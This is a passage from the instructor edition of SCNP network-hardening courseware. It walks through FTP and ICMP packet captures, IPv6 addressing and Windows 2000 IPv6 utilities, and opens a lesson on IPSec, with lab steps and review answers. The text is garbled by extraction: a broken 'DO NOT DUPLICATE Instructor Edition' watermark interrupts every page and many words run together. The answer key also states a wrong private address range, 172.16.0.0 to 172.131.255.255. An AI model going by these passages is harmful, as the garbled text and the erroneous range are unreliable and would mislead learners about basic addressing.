DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 100: SCNP Hardening

3. Switch to Network Monitor, and open the file ping.cap. It’s also locatedon your course CD-ROM, in the \085545\Data\Captures folder.

4. Observe that frame 1 is an Ethernet broadcast trying to resolve the tar-get IP address to its MAC address.

5. Observe that frame 2 is a reply from the target machine with the appro-priate resolution. From now on, the two hosts can communicate.

Lesson 1: Advanced TCP/IP 47

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 101: SCNP Hardening

6. Observe the next two frames. They are ICMP echo messages going backand forth between the two hosts, corresponding to the output in the text file.Examine the ICMP messages, and see the details in frames 3 and 4 asshown in the following graphics.

7. Observe that, for the ping command, no session was set up or torndown—just a simple ICMP echo request, followed by an ICMP echo reply.

48 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 102: SCNP Hardening

Continuing the Complete Session AnalysisIn the last task, one host successfully pinged another, in preparation for establish-ing an FTP transaction. We’ll look at the FTP portion of the session, but beforewe do, a quick differentiation between active and passive FTP is in order.

FTP CommunicationUp to this point you have been examining ICMP communication. Now you willexamine an active FTP session. There are two different types of FTP, somethingthat many administrators are unfamiliar with. The two FTP types are simplycalled passive and active.

The mode most people think of with FTP is active FTP. In active FTP, a clientmakes a connection to the FTP server. The client uses a port higher than 1024(we’ll call it X) to connect to the server, which then uses port 21, and the FTPcommand and control session is established. The server responds with the datatransfer, sent on port 20. The client will receive the data transfer on a port onehigher than the client used for command transfer, or X+1.

In passive mode FTP, the client initiates both connections between the client andthe server. When the FTP client begins an FTP session, the client opens two ports(again one higher than 1024, and the next port higher, or X and X+1). The firstconnection and port is the session to the server for command and control onserver port 21. The server then opens a random port (again higher than 1024,referred to as Y in this section), and sends this port information back to theclient. The client then requests the data transfer from client port X+1 to serverport Y.

When active FTP is used, there can be a situation that firewalls dislike. The firstpart of the FTP session, from client to server is not a problem. However, whenthe server responds to the client, it can seem to the firewall to be a new sessionstarted from an untrusted network, trying to gain access to the private network.

Passive FTP solves this problem on the firewall, as both parts of the FTP sessionoriginate from the FTP client, and no session starts from an untrusted network.There is a different problem with passive FTP. This problem is not on thefirewall, but on the server configuration itself. Because the FTP client starts bothsessions, the FTP server must be able to listen on any high port, meaning all highports must be open and available. To deal with this situation, many FTP applica-tions now include features that limit the port range that the server can use.

Lesson 1: Advanced TCP/IP 49

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 103: SCNP Hardening

TASK 1H-2Performing a Complete FTP Session Analysis

Objective: To use the supplied capture and text files to examine theTCP/IP headers, in order to understand how a session is setup, used, and torn down.

Setup: You are logged on to Windows 2000 as Administrator.Notepad and Network Monitor are running.

1. Switch to Notepad, and open the file ftp.txt. This file is located on yourcourse CD-ROM in the same folder as the other files. You should see theresults shown in the following graphic.

2. Observe that, in this session, when the ftp server asks for a password,the user enters it but it is not recorded on screen.

50 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 104: SCNP Hardening

3. Switch to Network Monitor, and open the file ftp.cap. You should see theresults similar to those shown in the following graphics. (Depending on theversion of Network Monitor you are using, MAC and IP addresses might bedisplayed in Hex, and the time might be in a different format.)

There are 51 frames involved in this capture.

4. If you would like to change the color of the FTP packets for easier viewing,choose Display→Colors. Scroll down and select FTP; then, from theBackground drop-down list, select a mild color such as gray or teal, andclick OK. If you select a darker color, it might make it more difficult to readthe text.

If you would like to changethe format of the addressesfrom Hex to more readablenames, choose Display→Addresses, and click Add. Inthe box that is displayed,enter FTPSITE for the Name,add 002B32CFC72 for theAddress, verify that the Typeis Ethernet, and click OK.Click Add again, then enterLOCAL for the Name, add0002B32C5B13 for theAddress, verify that the Typeis Ethernet, and click OKtwice.

Lesson 1: Advanced TCP/IP 51

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 105: SCNP Hardening

5. Observe that frames 3, 4, and 5 represent the TCP handshake involvedin establishing the session. Frames shaded gray (6, 8-9, 11-12, 14, 16-19,23, 29, 31-34, 38, 44, and 46-47) are all directly involved with the ftpapplication—authentication, ftp requests for directory information, an actualfile transfer, followed by a quit, and bye response.

6. Observe that in frame 8, you can see the user name being supplied.

7. Observe that in frame 9, you can see the request for a password.

8. Observe that in frame 11, you can see the password being supplied. Isn’tthis a good enough reason to employ some secure authentication such asencryption?

9. Let’s view the three-way handshake frames in a bit more detail.

Frame 3 starts the three-way handshake Active Open by setting the SYN bitto 1, offering source port no. 2025 (07E9 in Hex), while at the same timedirecting the request to port number 21 (15 in Hex) on the server. Asequence number 2052360112 (7A5487B0 in Hex) is associated with thisframe to uniquely identify it, even in the event of multiple sessions betweenthe same two hosts.

52 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 106: SCNP Hardening

10. Let’s look at the reply.

The reply from the ftp server in frame 4 includes an ACK, while simulta-neously including a SYN. This is the Passive Open.

11. Observe that frame 5 includes an ACK from the client.

Once the session is established, FTP can continue on with its setup. Thisincludes a login and a password (to be supplied if anonymous access in notsupported), followed by file requests.

Lesson 1: Advanced TCP/IP 53

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 107: SCNP Hardening

12. Observe that frame 6 shows the ftp server asking for user identification.Frame 8 shows the ftp client supplying the user name of testuser.

13. Observe that this is met by the ftp server asking for the password inframe 9.

54 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 108: SCNP Hardening

14. Observe that in frame 11, you can see the password being offered.Because no secure methods for authentication were set up, you can see theactual password (the word “plaintext”).

15. Observe that once the user has been authenticated, the ftp session isallowed to continue. The ftp server puts out the welcome message shownin frame 12.

Lesson 1: Advanced TCP/IP 55

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 109: SCNP Hardening

16. Observe that the rest of the frames dealing with FTP—frames 14, 16-19,23, 29, 31-34, 38, and 44—have to do with directory listings and filetransfers.

56 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 110: SCNP Hardening

Lesson 1: Advanced TCP/IP 57

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 111: SCNP Hardening

17. Observe that in frame 38, you can see the actual contents of the file as itis being transferred. In this case, and because it is just a text file, you canread the contents.

18. Observe that in frame 46, you can see the client attempt to close theconnection with the Quit command.

58 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 112: SCNP Hardening

19. Observe that in frame 47, you can see the server communicate with theclient with the message “See ya later.”

Lesson 1: Advanced TCP/IP 59

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 113: SCNP Hardening

20. Observe that these messages are followed by TCP terminating the ses-sion from both ends in frames 48 and 49, and 50 and 51, respectively,where the FIN bits are set to 1 and the corresponding frame contains theACK bit set to 1.

60 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 114: SCNP Hardening

21. Close Network Monitor. If you are prompted to save addresses, click No.

22. Close Notepad.

Lesson 1: Advanced TCP/IP 61

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 115: SCNP Hardening

Topic 1IFundamentals of IPv6It has been estimated by the U.S. Census Bureau that by the year 2050 there willbe over 9 billion people living on Earth. If we (for the moment, put economicsaside) are to attempt to provide the full use of the Internet to every person on theplanet, the current version of the Internet Protocol will likely be unable to handlethe demand. When we do the math, we can quickly calculate that IP version 4, orIPv4, will allow for only 4 billion addresses. Even if we take into considerationtechnologies such as Network Address Translation (NAT), it becomes quicklyobvious that an improvement is required.

The need for IP addresses is also not taking into consideration the expected surgein PDAs, cell phones with Web access, and many other different types of devicesthat will connect to the Internet. It is reasonable to expect that every person onthe planet will have a need for far more than one IP address.

From an addressing perspective, you may wonder how many IPv6 addresses areavailable, when compared to IPv4. As you know, IPv4 is a 32-bit number, offer-ing approximately 4 billion addresses. IPv6 addresses are 128-bit numbers,which—if you take the time to do the math—works out to approximately 340trillion, trillion, trillion addresses (or 3.4 x 1038). There are a few formattingissues, where a portion of the address space may not be used for single addresses;however, by most estimates, even after formatting, the low-end number that willremain is 35 trillion addresses. This should be more than enough addresses foreach person on the planet having every device imaginable connected to theInternet, with many addresses remaining.

If the need for addressing was not enough of a driving factor to show the needfor IPv6, another issue to consider is the IPv4 routing tables. As more and morepeople, and devices, use the Internet, the routing tables are getting more andmore complex. Imagine the routing table once every current IPv4 address is used.Routing will become quite difficult to manage.

IPv6 AddressesBecause IPv6 presents a solution to the addressing and other problems that arestarting to become prominent on the Internet, we will take a look into the basicsof this protocol, starting with the addresses of version 6. An IPv6 address is a128-bit number, which (for now) is not divided into the classes that are used inIPv4 addressing. The address is written in 8 blocks of 16 bits, using hexadecimalnumbering, and separated by a colon. The following two lines are examples ofIPv6 addresses:

8ab2:1cc3:2fa4:0:6b8a:31a2:9ef3:85bc

1012:321:544:300:0:0:0:17

IPv6 Addresses

IPv6 Address Formats

62 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 116: SCNP Hardening

A few points on the above addresses need to be clarified further. There does notneed to be a full four characters per block, such as in the address that is alldecimal. Additionally, it is possible to identify consecutive blocks of 0 using twocolons (::). When the two colons are used, be aware that they can only appearonce in an IP address. Using the two colons, the second address from abovewould look like this:

1012:321:544:300::17

Another type of address that can be present is called the dotted decimal suffixaddress. This is used during the transition between IPv4 and IPv6. This addresscombines the traditional IPv4 address with the hexadecimal used in IPv6. Anexample of this type of address would look like this:

::ffff:192.168.100.23

The final type of address to investigate is the loopback address. This address isquite different from the IPv4 address of 127.0.0.1. In IPv6, the loopback addressis much smaller, and looks like this:

::1

Unicasting and MulticastingIn IPv6, the concepts of broadcasting and multicasting of IPv4 are helpful, but donot directly link the two protocols together on these grounds. For example, inIPv6, there is no broadcast address at all. What are used are unicast, anycast, andmulticast addresses.

• Unicast addresses are identifiers for a single interface, and are what packetsare addressed to when sent to a specific interface. There are two unicastaddresses used in IPv6 that we will address in this topic:

— Link-local unicast address. Link-local addresses have been designed touse on a single link, such as when no routers are present.

— Site-local unicast address. Site-local addresses are designed for use byorganizations that intend to connect to the Internet, and can be routed.

• A multicast address is an identifier for a group of interfaces, and are whatpackets are addressed to when sending to groups of interfaces. Some of thedefined addresses for multicasting are:

— To address all nodes: FF01::1 or FF02::1.

— To address all router nodes: FF01::2 or FF02::2.

• The anycast address is also an identifier for a group of interfaces. When apacket is sent to an anycast address, it is delivered to one of the interfacesthat are identified by the address (often referred to as the nearest one).

In IPv6, when a node is searching for another node on the network, this is calledneighbor discovery. The ARP process used in IPv4 is not used in IPv6. Instead,what is used are ICMP and multicasting. Because the process uses ICMP, thisallows for more media independence and allows for IP security to be used, versusARP.

IPv6 X-casting

Routers in IPv6 networks donot forward packets that arefrom link-local addresses.

Lesson 1: Advanced TCP/IP 63

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 117: SCNP Hardening

IPv6 SecurityOne of the advantages that IPv6 presents over IPv4, in addition to the address-space and routing issues, is security. Although IPv4 allows for the addition ofsecurity by using IPSec, it is not mandated. In an IPv6 network, the use of IPSecis much more streamlined, because the functionality is built right in.

In IPv6, there are two extension headers that are used to increase security. Thesetwo are called the Authentication Header (AH) and the Encapsulating SecurityPayload (ESP).

The IP Authentication Header (AH) is used for providing authentication andintegrity. Keep in mind that since IPv6 datagrams are not encrypted, confidential-ity is not provided. And, although IPv6 datagrams are not encrypted by default,IPv6 does support multiple authentication techniques and algorithms.

The Encapsulation Security Payload Header is used to provide both integrity andconfidentiality on the IPv6 datagrams. In this implementation, the ESP uses Tun-nel Mode so that the whole IP packet is encrypted and a new unencrypted IPheader is added, and Transport Mode where only the payload is encrypted withoptions.

To install the IPv6 stack on Windows 2000 Professional or Server, you must berunning at least SP1 and running the IPv4 stack. To install the stack on Windows2000 running SP2 or higher, there are a few additional steps that need to be takento get it running successfully. The IPv6 stack is included with Windows XP, andcan be run by entering ipv6 install at the command prompt. The IPv6 stack runsparallel to the existing IPv4 stack, so there should be no conflicts.

TASK 1I-1Installing IPv6

Setup: You are logged on to Windows 2000 Server as Administrator.

1. Open the Network And Dial-up Connections Control Panel, and disablethe Classroom Hub interface.

2. At the root of your boot partition, create a folder called IPv6test.

Authentication Header:A field that immediately

follows the IP header in anIP datagram and provides

authentication and integritychecking for the datagram.

ESP:(Encapsulating Security

Payload) A mechanism toprovide confidentiality and

integrity protection to IPdatagrams.

authentication:To positively verify the

identity of a user, device, orother entity in a computer

system, often as aprerequisite to allowing

access to resources in asystem.

confidentiality:Assuring information will be

kept secret, with accesslimited to appropriate

persons.

For the tasks in this topic,you will use IPv6 on

Windows 2000. Microsofthas released the IPv6

Technology Preview foreducational and research

functions. It is not intendedfor commercial use at this

time.

64 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 118: SCNP Hardening

3. Copy the file tpipv6-001205.exe from the location specified by yourinstructor to the new folder.

4. From the local folder IPv6test, run tpipv6-001205.exe, and extract the filesto the same location.

5. Open the Run dialog box, and enter \ipv6test\setup.exe -x, and extractthe files to a subfolder of the current folder (for example, \IPv6test\files).Click OK to close the Extraction Complete information box.

6. Start a text editor, and open the file Hotfix.inf, which should be in thefolder containing the extracted files (\IPv6test\files).

7. In the Version section of the Hotfix.inf file, change the lineNTServicePackVersion=256 to NTServicePackVersion=512and save the change.

Close the text editor.

8. From the folder containing the extracted files (IPv6test\files), run Hotfix.exe.

9. When you are prompted to do so, click OK to reboot the computer to Win-dows 2000 Server. Log back on as Administrator.

10. Right-click My Network Places, and choose Properties.

11. Double-click the Ethernet interface that’s labeled Partner, and clickProperties.

12. Click the Install button.

13. Select Protocol, and click Add.

14. Select the Microsoft IPv6 Protocol and click OK.

15. Click Close twice.

Provide students with thelocation of the IPv6installation files.

Lesson 1: Advanced TCP/IP 65

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 119: SCNP Hardening

16. Open a command prompt, and enter the command ipv6 if. You shouldsee output resembling the following graphic.

17. Minimize the command prompt.

IPv6 InterfacesIn the previous task, when you issued the ipv6 if command, you saw that thereare four interfaces, numbered sequentially from 4 to 1.

• Interface 1 is used for IPv6 loopback. It is always a pseudo-interface.

• Interface 2 is used for configured tunneling, automatic tunneling, and 6-to-4tunneling. It is always a pseudo-interface.

• Interface 3 is a 6-over-4 interface.

• Interface 4 is the Ethernet interface.

Interfaces are numbered sequentially in the order created. This numbering willvary from computer to computer.

6-over-4 InterfacesTake another look at the output for Interface 3. This interface has a link-layeraddress of the form a.b.c.d. Now, as far as the OSI Model is concerned, youknow that addresses of the form a.b.c.d. are IPv4 Network layer addresses. How-ever, when IPv6 in its present form has to be tunneled over IPv4, the Networklayer IPv4 address a.b.c.d. is treated as a link-layer address by IPv6.

You will have one 6-over-4 interface for every IPv4 address assigned to yourcomputer. This means that, in the previous example, if you add a second IPv4address to an interface, such as 192.168.16.1, and run the ipv6 if command again,you will see a fifth listing in addition to the other four.

IPv6 Interface Types

The terms link-local addressand link-level address are

often used interchangeably.

66 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 120: SCNP Hardening

Figure 1-21: Additional virtual interface for second IP address.

The link-local address of a 6-over-4 interface is FE80::a.b.c.d, expressed in IPv6colon-hexadecimal notation. For example, for the IPv4 address 172.27.10.1, thecorresponding link-local address is fe80::ac1b:a01 (because 172 = 0xAC,27=0x1B, 10=0xA, and 1=0x1; therefore 172.27.10.1 = 0xAC1BA01). RFC 2529provides more information about 6-over-4.

Ethernet InterfacesTake another look at the Interface 4 (the Ethernet interface). This interface has alink-local address of fe80::2d0:9ff:fe7f:b21. The format of this address is fe80::2-half-the-MAC:ff:fe-the-other-half-of-the-MAC. Of course, the actual method ofcalculating this value is slightly different, but we will worry about that later.

Interfaces that are listed with the traditional, 48-bit, link-layer address areEthernet interfaces. You should have one Ethernet interface for every Ethernetadapter. The link-local address of the Ethernet interface will use the IPv6 inter-face identifier derived from the MAC address. For example, if the link-leveladdress is 00-20-78-03-a5-b7, then the preferred address is listed asfe80::220:78ff:fe03:a5b7.

Lesson 1: Advanced TCP/IP 67

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 121: SCNP Hardening

TASK 1I-2Getting Another 6-over-4 Address

Setup: You are logged on to Windows 2000 Server as Administrator.IPv6 had been installed, and a command prompt and the Net-work And Dial-up Connections Control Panel are open.

1. Double-click the Partner interface, and click Properties.

2. Double-click Internet Protocol (TCP/IP).

3. Click Advanced. You should see an IP address listed, such as 172.26.10.z or172.28.10.z.

4. In the IP Addresses box, click Add.

If you are on the LEFT side of the classroom, add the IP address 192.168.26.z. For the value z, use the same value as the last octet of your existing IPaddress. Leave the subnet mask at 255.255.255.0.

If you are on the RIGHT side of the classroom, add the IP address 192.168.28.z. For the value z, use the same value as the last octet of yourexisting IP address. Leave the subnet mask at 255.255.255.0.

5. Click Add, then click OK three times, and then click Close.

6. Switch to the command prompt, and enter the ipv6 if command.

7. Verify that the output reflects a new 6-over-4 address based on the newIP address you just added.

8. Remove the IP address that you just added.

IPv6 UtilitiesJust as the TCP/IP stack for IPv4 comes with troubleshooting tools such as ping,tracert, and so forth, the IPv6 stack also provides some built-in tools, such as:

• ipv6

• ipsec6

• ping6

• tracert6

• 6to4cfg

• ttcp

• net

The net command has many subcommands, and their corresponding argumentsand options, such as net stop and net start, will enable you to stop or startservices. You can use this to stop or start IPv6. You should know that if you stopand start IPv6, you may end up changing interface numbers (after interfaces 1and 2 are accounted for), because doing this is equivalent to reinitializing theinterfaces after a reboot.

IPv6 Utilities

68 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 122: SCNP Hardening

The ipv6.exe CommandYou can use the ipv6.exe command to manually configure interfaces, retrieveinformation about the state of the interfaces, and so forth. All configuration ofIPv6 protocol parameters can be done with this command. You can also use it toquery and configure addresses, caches, and routes, by using the manysubcommands and their corresponding arguments and options. In fact, you havealready used this command with the if option to view information on interfaces.

TASK 1I-3Interface Initializing

Setup: You are logged on to Windows 2000 Server as Administrator.IPv6 had been installed, and a command prompt is open.

1. At the command prompt, enter net stop tcpip6 to stop the IPv6 stack.

2. Enter ipv6 if, and observe the response. You should see a message statingthat the IPv6 protocol stack could not be accessed.

3. Enter net start tcpip6 to restart the IPv6 stack.

4. Enter ipv6 if, and verify that you receive output relating to theinterfaces.

Using the ipsec6.exe CommandYou can use the ipsec6.exe command to configure IPSec policies and SAs (Secu-rity Associations) for the IPv6 protocol. As with ipv6.exe, the ipsec6.exe hasmany subcommands, each with its own set of arguments and options. IPSec iscovered in greater depth later in the course.

TASK 1I-4Using the ipsec6 Command

Setup: You are logged on to Windows 2000 Server as Administrator.IPv6 has been installed, and a command prompt is open.

1. At the command prompt, enter ipsec6 -? to get help on the ipsec6command.

2. Observe the explanation for the switches sp and sa. These switches enableyou to print the security policy and security associations entries to thescreen.

3. Enter ipsec6 sp, and observe the output, which wraps around in yourdisplay.

Lesson 1: Advanced TCP/IP 69

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 123: SCNP Hardening

4. Enter ipsec6 sa, and observe the output, which again wraps around in yourdisplay. These entries are quite wide, in terms of the number of ASCII char-acters used; therefore, you will redirect the output from these commands totext files and use Notepad to view them.

5. Enter ipsec6 sp > sp-out.txt to direct the output to a new file calledsp-out.txt.

6. Enter ipsec6 sa > sa-out.txt to direct the output to a new file calledsa-out.txt.

7. Locate the two text files you just created, and open them in Notepad.

8. In the file sp-out.txt, observe that you do not have a security policy.

9. In the file sa-out.txt, observe that you do not have a security association.

If you want to use IPSec with IPv6, you first need to create similar text filesusing the ipsec6 command with the c switch, followed by a file name; forexample, ipsec6 c secur. Two files will automatically be created foryou—one with the extension .spd and the other with the extension .sad—which, as you can figure out by now, means that security-policy descriptorsneed to be entered in the SPD file and security-association descriptors needto be entered in the SAD file.

10. Close Notepad.

Using the ping6.exe CommandYou can use the ping6 command with IPv6 just as you use ping with IPv4. Byusing this command, you send ICMPv6 Echo Request messages, and can evaluatethe corresponding replies.

TASK 1I-5Using the ping6 Command

Setup: You are logged on to Windows 2000 Server as Administrator.IPv6 has been installed, and a command prompt is open.

1. Enter ping -? to get help on the ping command.

2. Enter ping6 -?, and compare the versions of ping for IPv4 and IPv6.

3. Enter ipv6 if.

70 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 124: SCNP Hardening

Record the first preferred address under the link-local address:Each address will be different.

4. Enter ping6 neighboring_IPv6_address, and observe the output. Youshould see output similar to the following graphic.

Capturing and Analyzing IPv6 TrafficBy now, you’re probably beginning to wonder how this IPv6 ping packet wouldbe different from an IPv4 ping packet. So let’s perform some captures.

You can use Network Monitor to perform these captures, if you install the appro-priate add-ons, or parsers. We will use Ethereal, however, as the current version(which we installed and examined earlier) includes IPv6 support without havingto install any add-ons.

TASK 1I-6Capturing and Analyzing IPv6 Traffic

Setup: You are logged on to Windows 2000 Server as Administrator.IPv6 has been installed, and a command prompt is open.

Note:For this task, you should work in pairs.

1. On one machine, start Ethereal. (From the Start menu, choose Programs→Ethereal→Ethereal.)

2. Start a capture.

3. In the Interface selection box, select the adapter you want to perform thecapture on.

4. Click OK.

5. In the command prompt window, enter ping6 neighboring_IPv6_address,and watch the activity taking place with respect to the four echo replies.

6. In Ethereal, stop the capture.

7. Highlight the ICMPv6 Echo Requests and Replies, and view theircontents.

Lesson 1: Advanced TCP/IP 71

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 125: SCNP Hardening

8. What is the Ethertype for IPv6?

0x86dd.

9. Start another capture.

10. This time, from the neighboring machine, enter tracert6 neighboring_IPv6_address, and watch the activity taking place with respect to the traceroute.

11. In Ethereal, stop the capture.

12. Highlight the ICMPv6 Echo Requests and Replies, and view theircontents.

13. Observe the differences in contents, compared to the ping6 packets.

Note: Perform the rest of this task on all computers.

14. Stop the IPv6 stack by using the net stop tcpip6 command.

15. Re-enable the Classroom Hub interface.

16. Close all open windows.

SummaryIn this lesson, you looked deep into the structure of the TCP/IP protocol.You reviewed the RFCs associated with IP, ICMP, TCP, and UDP. You thenused Network Monitor and Ethereal to capture and analyze IP packets. Youexamined captures associated with network traffic. You learned to read theactual data being transmitted between two or more hosts. Finally, you ana-lyzed a complete session, frame-by-frame. You also took a look at atechnology preview of IPv6.

Lesson Review1A How many layers are in the OSI Model?

Seven.

How many layers are in the TCP/IP Model?

Four.

What are the assignable classes of IP addresses?

A, B, and C.

72 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 126: SCNP Hardening

What are the three private ranges of IP addresses, as defined in theRFCs?

a. 10.0.0.0 to 10.255.255.255

b. 172.16.0.0 to 172.131.255.255

c. 192.168.0.0 to 192.168.255.255

1B How many control flags are in a TCP header?

Six.

What is the function of an acknowledgement number?

To provide an acknowledgement for a received packet. The value is usuallytied into the SYN number on the received packet.

How many steps are required to establish a TCP connection?

Three.

How many steps are required to tear down a TCP connection?

Four.

What are the two main views of Network Monitor?

Display View and Capture View.

1C What is the first field that is read by the computer in the IP header?

Version.

What is the Protocol ID of ICMP in the IP header?

1.

What is the Protocol ID of TCP in the IP header?

6.

What is the Protocol ID of UDP in the IP header?

17.

1D What is the first field that is read by the computer in the ICMP mes-sage?

Type.

How many bits make up the Type field?

Eight.

How many bits make up the Code field?

Eight.

1E What is the first field that is read by the computer in the TCP header?

Source Port Number.

Lesson 1: Advanced TCP/IP 73

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 127: SCNP Hardening

How many control bits are in the TCP header?

Six.

How many bits is the Sequence Number?

32.

How many bits is the Acknowledgement Number?

32.

1F What is the first field that is read by the computer in the UDP header?

Source Port Number.

What is the UDP header and data encapsulated in?

An IP datagram.

How many bits are both the source and destination port numbers?

16.

What is in the payload of the tftp.cap file that you analyzed?

Cisco Router Configuration and Access Lists.

1G In the fragment.cap file that you analyzed, how do you suppose thisfragmentation happened?

By a user sending a large ping. (See the file fragment.txt, in the same folderas fragment.cap, to understand how this was initiated.)

Why is there no upper-layer protocol list in the Detail pane for frames 2through 13?

These are the subsequent fragments whose upper-layer protocol is referredto in the first fragment; therefore, they do not have any header informationother than IP.

What was the upper-layer protocol that caused the fragmentation?

ICMP.

1H In the FTP capture file that you analyzed in this topic, what pair ofsockets are involved in the initial three-way handshake?

On the client: IP address 172.16.30.2, port 2025. On the FTP Server: IPaddress 172.16.30.1, port 21.

In the FTP capture file that you analyzed in this topic, what pair ofsockets are involved in the exchange of FTP data in response to therequest for directory listing?

On the FTP Server: IP address 172.16.30.1, port 20. On the client: IPaddress 172.16.30.2, port 2026.

74 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 128: SCNP Hardening

In the FTP capture file that you analyzed in this topic, what framesindicate that a three-way handshake is taking place between the FTPserver and the client in preparation for the sending of FTP data inresponse to the request for the file textfile.txt?

Frames 35, 36, and 37.

1I What is the essential difference between a link-local and a site-localunicast address?

The essential difference is that link-local addresses are not routable. Site-local addresses can be routed.

List some of the utilities provided to you by Microsoft in its IPv6 tech-nology preview.

Some of the utilities are ipv6, ipsec6, ping6, tracert6, 6to4cfg, and ttcp.

What are the two files required to configure ipsec6 with ipv6 in Win-dows 2000?

Filename.spd and filename.sad.

Lesson 1: Advanced TCP/IP 75

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 129: SCNP Hardening

76 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 130: SCNP Hardening

Implementing IPSec

OverviewIn this lesson, you will be introduced to the concepts of IPSec. You willexamine and configure the Microsoft Management Console and identify thepredefined IPSec policies in Windows 2000. You will create new policiesand implement IPSec to specifically use AH, ESP, or both, in TransportMode. Finally, you will analyze IPSec traffic in Network Monitor.

ObjectivesTo be able to implement IPSec, you will:

2A Define the function of IPSec in a networked environment.

Given a running network, you will examine the IPSec structure, cryptog-raphy, the Encapsulating Security Payload, the Authentication Header, theInternet Key Exchange, and modes of Implementation.

2B Examine IPSec policy management.

Given a running network, you will examine the IPSec structure, cryptog-raphy, the Encapsulating Security Payload, the Authentication Header, theInternet Key Exchange, and modes of implementation.

2C Implement and examine IPSec AH configurations.

Given a Windows 2000 computer, you will implement and analyze IPSecAH sessions.

2D Implement and examine IPSec ESP configurations.

Given a Windows 2000 computer, you will implement and analyze IPSecESP sessions.

2E Implement and examine IPSec AH and ESP configurations.

Given a Windows 2000 computer, you will implement and analyze IPSecAH and ESP sessions.

Data Filesnewroot.cer

Lesson Time3 hours, 30 minutes

LESSON

2

Lesson 2: Implementing IPSec 77

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 131: SCNP Hardening

Topic 2AInternet Protocol SecurityThe Internet Protocol (IP) by itself has no security. There are no built-in mecha-nisms to ensure the security of the packets. It has become possible for attackersto create bogus packets, posing as IP addresses that they are not. It has alsobecome possible for attackers to intercept packets as they are transmitted on theInternet, and read into the payload of the packets. Due to the above-mentionedpoints, there is no way for the security professional to guarantee any of the fol-lowing:

• That a packet is from the source IP address.

• That a packet was not copied or intercepted by a third party duringtransmission.

• That a packet holds the original data that was transmitted.

These issues combine to illustrate that security of the packets themselves isrequired.

IPSec, or IP Security (described in detail in RFC 2401) can provide this security.In the simplest definition, IPSec protects IP datagrams. In a more detailed defini-tion, IPSec provides confidentiality, integrity, and authentication.

• Confidentiality means there is a system of making the data unreadable byunauthorized individuals.

• Integrity means that there is a guarantee that data is not altered between thesender and the receiver.

• Authentication means that the receiver is guaranteed that the sender is not animposter.

The way that IPSec is able to provide this protection is by specifying how thenetwork traffic is going to be protected, and to whom the traffic will be sent. Theway the traffic is going to be protected will be through an IPSec protocol such asthe Authentication Header (AH) or the Encapsulating Security Payload (ESP).

The operation of IPSec is completely transparent to the end-user. This is due tothe fact that IPSec functions just above the Network layer (the IPSec protocolsAH and ESP have their own IP protocol IDs), so they are well under the Applica-tion layer. Providing this automatic protection is significant in the choice ofwhether or not to implement IPSec. The end result is that network traffic isencrypted on one end and decrypted on the other, without the upper-layer applica-tions at either end worrying about the complexities of the encryption/decryptionprocesses.

IPSec

78 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 132: SCNP Hardening

Cryptography and KeysIPSec is able to provide protection by encrypting and decrypting data. Although adetailed discussion of cryptography is beyond the scope of this book, the verybasics are required. (A detailed discussion and hands-on study of cryptographyand encryption techniques will be undertaken in Level 2 of the SCP.)

Any file before encryption is typically referred to as plaintext. Once that file isencrypted, using a mathematical algorithm, it is referred to as ciphertext. In orderto decrypt this file (or message), you must have a key that can reverse theencryption. You can think of an encryption algorithm as a lock and the key as thelock’s combination. If a document is locked, you need a key to unlock it. Oftenin cryptography, one key is used to lock (encrypt) the document, and the samekey or a different key is used to unlock (decrypt) the document, depending uponthe methodology chosen. If a different key is used, the two keys are linked toeach other via the algorithm and the associated mathematical functions.

IPSec requires that users have a method of exchanging (sometimes called negoti-ating) their keys.

• One method is called manual distribution. In the simplest definition, this lit-erally means each user manually giving every other user his or her key.Manual distribution will more likely be done with what is called a KDC, orKey Distribution Center.

